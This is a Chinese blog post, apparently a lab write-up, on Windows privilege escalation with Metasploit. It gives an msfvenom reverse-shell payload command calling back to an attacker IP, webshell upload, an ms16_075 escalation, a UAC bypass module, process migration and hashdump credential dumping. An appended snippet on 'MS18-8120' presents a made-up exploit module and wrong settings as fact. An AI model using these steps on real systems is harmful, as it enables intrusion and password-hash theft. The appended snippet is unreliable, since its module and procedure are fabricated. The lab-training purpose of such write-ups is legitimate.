metasploit进行windows提权 UAC绕过提权

文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

MSF进行UAC绕过

首先通过kali来生成一个exe文件。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.45.135 lport=12345 -f exe >sss.exe

在这里插入图片描述
将生成的文件上传通过webshell上传到服务器可执行目录上:
在这里插入图片描述
kali上使用use exploit/multi/handler模块,设置好参数,webshell上运行后,反弹session到kali
查看权限为IIS组权限,这里LHOST写错了:

在这里插入图片描述
使用backgrounp将session保存到后台。同样我们可以使用sessions -i 来进行查看。
在这里插入图片描述
使用 use post/multi/recon/local_exploit_syggester 或者在meterpreter中使用run post/windows/gather/enum_patches
msf6里面上述的命令无法直接看到可用的提权攻击载荷。可能是msf6的BUG吧。原因不明。

这里我们直接使用ms16-075模块进行提权。

use exploit/windows/local/ms16_075_reflection_juicy

只需要将之前的session在这个载荷中set Session 中添加即可。
运行后,成功反弹session,查看权限为系统权限。

在这里插入图片描述
使用ps查看进程,然后使用migrate PID号来迁移进程。
在这里插入图片描述
同样可以使用其余的办法去提权。
例如使用getsystem来提权,但此操作需要绕过UAC限制。

描述:

UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户
确认是否授权当前可执行文件来达到阻止恶意程序的目的。

在这里插入图片描述
为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行弹窗直接运行执行文件)
为了保证session的稳定性, 可以使用命令来提前迁移进程。
这种无法使用getsystem提权,也同样属于UAC限制。

set AutoRunScript migrate -f 

但UAC提权,必须是在管理员组中,不能在通过webshell获得的IIS组权限,否则因权限太低会导致无法绕过UAC。

漏洞复现:

首先生成exe,在服务端点击,获取管理员组权限:
但这上面我们可以看出getsystem 无法使用。

在这里插入图片描述
通过search uac 来查看攻击载荷。并利用,可以看出已能直接绕过UAC 进行getsystem提权。但依然不能使用hashdump

use exploit/windows/local/bypassuac_injection

在这里插入图片描述
这个就可以使用ps查看下进程,然后将进程迁移到x64位的系统管理员权限进程中。成功使用hashdump
在这里插入图片描述

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
MS18-8120是一个Windows提权漏洞,它可以影响Windows 7 SP1 x86和x64、Windows 8.1 x86和x64、Windows Server 2008 R2 SP1、Windows Server 2012和Windows Server 2012 R2。这个漏洞是在Windows内核中存在一个缺陷,攻击者可以利用这个缺陷来提升他们的权限,从而执行任意代码。 下面是一些利用MS18-8120漏洞进行Windows提权的步骤: 1.使用Metasploit框架:Metasploit是一个开源的渗透测试框架,它可以帮助安全专业人员快速、高效地发现和利用漏洞。在这个案例中,我们将使用Metasploit框架来利用MS18-8120漏洞。 2. 扫描目标:首先,我们需要扫描目标系统以检测是否存在漏洞。使用Nmap或其他扫描工具扫描目标IP地址,如下所示: ``` nmap -sV -O targetIP ``` 3. 打开Metasploit:打开Kali Linux操作系统并打开Metasploit框架,使用以下命令: ``` msfconsole ``` 4. 搜索漏洞利用模块:在Metasploit控制台中,使用以下命令搜索与MS18-8120漏洞相关的模块: ``` search MS18-8120 ``` 5. 选择漏洞利用模块:从搜索结果中选择一个适合我们的漏洞利用模块。在这个案例中,我们将选择“exploit/windows/local/ms18_8120_dcom”,使用以下命令: ``` use exploit/windows/local/ms18_8120_dcom ``` 6. 配置漏洞利用模块:在我们使用模块之前,我们需要配置一些参数。使用以下命令来查看可用的参数: ``` show options ``` 7. 配置目标IP地址和端口号:我们需要设置目标IP地址和端口号。使用以下命令设置目标IP地址和端口号: ``` set RHOST targetIP set RPORT targetPort ``` 8. 运行漏洞利用模块:设置完参数后,使用以下命令运行漏洞利用模块: ``` run ``` 9. 检查提权结果:漏洞利用模块运行后,我们可以检查提权结果。使用以下命令检查当前用户的权限: ``` getuid ``` 如果返回结果为“NT AUTHORITY\SYSTEM”,则说明我们已经成功提升了我们的权限。 总结: 通过使用Metasploit框架和MS18-8120漏洞利用模块,我们可以快速、高效地进行Windows提权攻击。但是请注意,任何未经授权的攻击都是非法的。只有在合法的渗透测试环境中使用这些技术。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值